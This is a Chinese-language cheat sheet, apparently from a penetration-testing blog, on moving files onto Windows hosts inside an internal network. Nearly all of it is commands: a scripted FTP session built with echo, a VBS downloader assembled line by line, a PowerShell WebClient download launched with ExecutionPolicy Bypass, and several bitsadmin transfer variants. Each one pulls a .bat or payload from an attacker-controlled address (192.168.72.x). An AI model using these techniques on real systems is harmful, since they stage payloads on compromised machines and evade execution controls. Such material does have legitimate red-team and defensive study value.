内网文件下载传输

(Updated: )

Windows

0x00 FTP

1
2
3
4
5
6
7
8
echo open 192.168.72.14 21 >> 1.txt         //登陆FTP服务器
echo test>>1.txt                              //用户名
echo 111111>>1.txt                              //密码
echo bin>>1.txt                              //开始
echo get fw.sh>>1.txt                      //下载程序
echo bye>>1.txt                              //关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个1.txt文件,执行命名:
ftp -s:1.txt                        //以1.txt中的内容执行ftp命令

0x01 VBS脚本文件下载

test.vbs脚本:

1
2
3
4
5
6
7
8
9
echo Set xPost=createObject("Microsoft.XMLHTTP") >>test.vbs
echo xPost.Open "GET","http://192.168.72.14/1.bat",0  >>test.vbs
echo xPost.Send() >>test.vbs
echo set sGet=createObject("ADODB.Stream") >>test.vbs
echo sGet.Mode=3 >>test.vbs
echo sGet.Type=1 >>test.vbs
echo sGet.Open() >>test.vbs
echo sGet.Write xPost.ResponseBody >>test.vbs
echo sGet.SaveToFile "c:\file.zip",2 >>test.vbs

这样会在当前目录生成test.vbs
然后执行:

1
cscript test.vbs

0x02 Powershel

1
powershell -ExecutionPolicy Bypass -File .\test.ps1

test.ps1内容:

1
2
$d = New-Object System.Net.WebClient
$d.DownloadFile("http://192.168.72.14/1.bat","1.bat")

0x03 bitsadmin

第一种

1
bitsadmin /transfer n http://192.168.72.13/1.bat c:\new\1.bat

第二种

1
bitsadmin /rawreturn /transfer getfile http://192.168.72.13/1.bat c:\new\1.bat

第三种

1
bitsadmin /rawreturn /transfer getpayload http://192.168.72.13/1.bat c:\new\1.bat

第四种

1
bitsadmin /transfer aa http://192.168.72.13/1.bat c:\new\1.bat

第五种

1
2
3
4
5
6
7
8
9
bitsadmin /create aa

bitsadmin /addfile qianxiao996 http://192.168.72.13/1.bat c:\new\1.bat

bitsadmin /resume aa

bitsadmin /info aa /verbose

bitsadmin /complete aa